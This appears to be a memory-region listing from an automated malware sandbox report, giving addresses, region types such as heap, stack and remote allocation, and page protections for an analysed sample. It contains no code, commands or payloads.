5265000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
44E000
|
unkown
|
page readonly
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
743D000
|
stack
|
page read and write
|
||
|
6C40000
|
direct allocation
|
page read and write
|
||
|
55CC000
|
heap
|
page read and write
|
||
|
48CC000
|
stack
|
page read and write
|
||
|
20640000
|
direct allocation
|
page read and write
|
||
|
2119B000
|
stack
|
page read and write
|
||
|
C50000
|
trusted library allocation
|
page read and write
|
||
|
22426000
|
unclassified section
|
page execute and read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
A6E000
|
stack
|
page read and write
|
||
|
224E0000
|
unclassified section
|
page execute and read and write
|
||
|
A2E000
|
stack
|
page read and write
|
||
|
6B70000
|
direct allocation
|
page read and write
|
||
|
5581000
|
heap
|
page read and write
|
||
|
B2A000
|
heap
|
page read and write
|
||
|
21D60000
|
unclassified section
|
page execute and read and write
|
||
|
3215000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
54E8000
|
heap
|
page read and write
|
||
|
2184B000
|
heap
|
page read and write
|
||
|
21DA0000
|
unclassified section
|
page execute and read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
305C000
|
stack
|
page read and write
|
||
|
7EF7000
|
stack
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page read and write
|
||
|
205C0000
|
direct allocation
|
page read and write
|
||
|
8CB0000
|
direct allocation
|
page execute and read and write
|
||
|
6EE000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
6C50000
|
direct allocation
|
page read and write
|
||
|
2D5D000
|
stack
|
page read and write
|
||
|
BF0000
|
trusted library section
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
22022000
|
unclassified section
|
page execute and read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
22242000
|
unclassified section
|
page execute and read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
5573000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
28A9000
|
heap
|
page read and write
|
||
|
756B000
|
stack
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
225F0000
|
unclassified section
|
page execute and read and write
|
||
|
21CD6000
|
unclassified section
|
page execute and read and write
|
||
|
71D8000
|
heap
|
page read and write
|
||
|
5850000
|
direct allocation
|
page read and write
|
||
|
5AA1000
|
trusted library allocation
|
page read and write
|
||
|
45F000
|
system
|
page execute and read and write
|
||
|
5880000
|
heap
|
page read and write
|
||
|
21D82000
|
unclassified section
|
page execute and read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
2C90000
|
remote allocation
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
223B0000
|
unclassified section
|
page execute and read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
259C000
|
stack
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
20DB0000
|
unclassified section
|
page execute and read and write
|
||
|
550B000
|
heap
|
page read and write
|
||
|
5860000
|
direct allocation
|
page read and write
|
||
|
72A6000
|
heap
|
page read and write
|
||
|
5656000
|
unclassified section
|
page execute and read and write
|
||
|
217E9000
|
heap
|
page read and write
|
||
|
BE8000
|
heap
|
page read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
20670000
|
direct allocation
|
page read and write
|
||
|
CC7000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
C52000
|
trusted library allocation
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
2129D000
|
stack
|
page read and write
|
||
|
55BC000
|
heap
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
7F00000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
205B0000
|
direct allocation
|
page read and write
|
||
|
73BE000
|
stack
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
21770000
|
heap
|
page read and write
|
||
|
B48000
|
heap
|
page read and write
|
||
|
20F6F000
|
stack
|
page read and write
|
||
|
21460000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
2310000
|
heap
|
page read and write
|
||
|
22030000
|
unclassified section
|
page execute and read and write
|
||
|
25FC000
|
stack
|
page read and write
|
||
|
20D3E000
|
stack
|
page read and write
|
||
|
7FF0000
|
heap
|
page read and write
|
||
|
5581000
|
heap
|
page read and write
|
||
|
55CF000
|
heap
|
page read and write
|
||
|
2808000
|
heap
|
page read and write
|
||
|
27FF000
|
stack
|
page read and write
|
||
|
20BB0000
|
heap
|
page read and write
|
||
|
23B0000
|
heap
|
page read and write
|
||
|
841B000
|
heap
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
737E000
|
stack
|
page read and write
|
||
|
225CF000
|
unclassified section
|
page execute and read and write
|
||
|
497E000
|
stack
|
page read and write
|
||
|
83D000
|
stack
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
44B000
|
unkown
|
page read and write
|
||
|
70A0000
|
heap
|
page execute and read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
21B70000
|
unclassified section
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
45A000
|
unkown
|
page readonly
|
||
|
8090000
|
trusted library allocation
|
page execute and read and write
|
||
|
5660000
|
unclassified section
|
page execute and read and write
|
||
|
42A000
|
unkown
|
page read and write
|
||
|
22120000
|
unclassified section
|
page execute and read and write
|
||
|
5548000
|
heap
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
2141D000
|
stack
|
page read and write
|
||
|
8590000
|
heap
|
page read and write
|
||
|
49F0000
|
heap
|
page execute and read and write
|
||
|
D28000
|
trusted library allocation
|
page read and write
|
||
|
20DD2000
|
unclassified section
|
page execute and read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
54B5000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
830C000
|
stack
|
page read and write
|
||
|
22380000
|
unclassified section
|
page execute and read and write
|
||
|
21EF0000
|
unclassified section
|
page execute and read and write
|
||
|
52DB000
|
trusted library allocation
|
page read and write
|
||
|
9BF000
|
stack
|
page read and write
|
||
|
332E000
|
unkown
|
page read and write
|
||
|
7278000
|
heap
|
page read and write
|
||
|
20E20000
|
direct allocation
|
page read and write
|
||
|
55E0000
|
unclassified section
|
page execute and read and write
|
||
|
21E16000
|
unclassified section
|
page execute and read and write
|
||
|
2111E000
|
stack
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
D0E000
|
stack
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
7097000
|
trusted library allocation
|
page read and write
|
||
|
C4A000
|
trusted library allocation
|
page execute and read and write
|
||
|
22570000
|
unclassified section
|
page execute and read and write
|
||
|
22300000
|
unclassified section
|
page execute and read and write
|
||
|
55CB000
|
heap
|
page read and write
|
||
|
205E0000
|
direct allocation
|
page read and write
|
||
|
A78000
|
heap
|
page read and write
|
||
|
22556000
|
unclassified section
|
page execute and read and write
|
||
|
22430000
|
unclassified section
|
page execute and read and write
|
||
|
205F0000
|
direct allocation
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
26FD000
|
stack
|
page read and write
|
||
|
4920000
|
trusted library allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
45F000
|
system
|
page execute and read and write
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
2A0E000
|
unkown
|
page read and write
|
||
|
214D9000
|
heap
|
page read and write
|
||
|
209D0000
|
heap
|
page read and write
|
||
|
4910000
|
trusted library allocation
|
page execute and read and write
|
||
|
22270000
|
unclassified section
|
page execute and read and write
|
||
|
31FB000
|
heap
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
293E000
|
stack
|
page read and write
|
||
|
5870000
|
direct allocation
|
page read and write
|
||
|
4AF1000
|
trusted library allocation
|
page read and write
|
||
|
721E000
|
heap
|
page read and write
|
||
|
5AB9000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
222E6000
|
unclassified section
|
page execute and read and write
|
||
|
20FC0000
|
remote allocation
|
page read and write
|
||
|
20600000
|
direct allocation
|
page read and write
|
||
|
54B0000
|
heap
|
page read and write
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
44E000
|
unkown
|
page readonly
|
||
|
418000
|
unkown
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
21F66000
|
unclassified section
|
page execute and read and write
|
||
|
6ACE000
|
stack
|
page read and write
|
||
|
2104F000
|
stack
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
22FF000
|
stack
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
2FC000
|
stack
|
page read and write
|
||
|
6B8000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page execute and read and write
|
||
|
70A000
|
heap
|
page read and write
|
||
|
5A99000
|
trusted library allocation
|
page read and write
|
||
|
2830000
|
remote allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2C70000
|
remote allocation
|
page read and write
|
||
|
6E80000
|
heap
|
page read and write
|
||
|
45F000
|
system
|
page execute and read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
21EB0000
|
unclassified section
|
page execute and read and write
|
||
|
72B8000
|
heap
|
page read and write
|
||
|
5EC000
|
stack
|
page read and write
|
||
|
221A0000
|
unclassified section
|
page execute and read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
2300000
|
heap
|
page read and write
|
||
|
2131D000
|
stack
|
page read and write
|
||
|
3E60000
|
remote allocation
|
page execute and read and write
|
||
|
2EBC000
|
stack
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
7FEE000
|
stack
|
page read and write
|
||
|
220B0000
|
unclassified section
|
page execute and read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
212DE000
|
stack
|
page read and write
|
||
|
6F7000
|
heap
|
page read and write
|
||
|
22220000
|
unclassified section
|
page execute and read and write
|
||
|
21771000
|
heap
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
20ACD000
|
stack
|
page read and write
|
||
|
2B4F000
|
stack
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
BAF000
|
stack
|
page read and write
|
||
|
8EF000
|
stack
|
page read and write
|
||
|
2390000
|
heap
|
page read and write
|
||
|
2FDC000
|
stack
|
page read and write
|
||
|
6AF000
|
stack
|
page read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
408000
|
unkown
|
page readonly
|
||
|
6B90000
|
direct allocation
|
page read and write
|
||
|
421000
|
unkown
|
page read and write
|
||
|
557E000
|
heap
|
page read and write
|
||
|
342F000
|
unkown
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
4A08000
|
remote allocation
|
page execute and read and write
|
||
|
54E0000
|
heap
|
page read and write
|
||
|
2210F000
|
unclassified section
|
page execute and read and write
|
||
|
20CDF000
|
unclassified section
|
page execute and read and write
|
||
|
20E9E000
|
stack
|
page read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
22000000
|
unclassified section
|
page execute and read and write
|
||
|
20E50000
|
direct allocation
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
A1F000
|
stack
|
page read and write
|
||
|
C39000
|
trusted library allocation
|
page read and write
|
||
|
838D000
|
stack
|
page read and write
|
||
|
2820000
|
remote allocation
|
page read and write
|
||
|
5C38000
|
trusted library allocation
|
page read and write
|
||
|
21E8F000
|
unclassified section
|
page execute and read and write
|
||
|
838000
|
stack
|
page read and write
|
||
|
20650000
|
direct allocation
|
page read and write
|
||
|
C55000
|
trusted library allocation
|
page execute and read and write
|
||
|
8185000
|
trusted library allocation
|
page read and write
|
||
|
AEA000
|
heap
|
page read and write
|
||
|
211DE000
|
stack
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
22612000
|
unclassified section
|
page execute and read and write
|
||
|
224C2000
|
unclassified section
|
page execute and read and write
|
||
|
4BE6000
|
trusted library allocation
|
page read and write
|
||
|
21FDF000
|
unclassified section
|
page execute and read and write
|
||
|
21802000
|
heap
|
page read and write
|
||
|
A5E000
|
stack
|
page read and write
|
||
|
49BE000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
346E000
|
stack
|
page read and write
|
||
|
21CE0000
|
unclassified section
|
page execute and read and write
|
There are 436 hidden memdumps, click here to show them.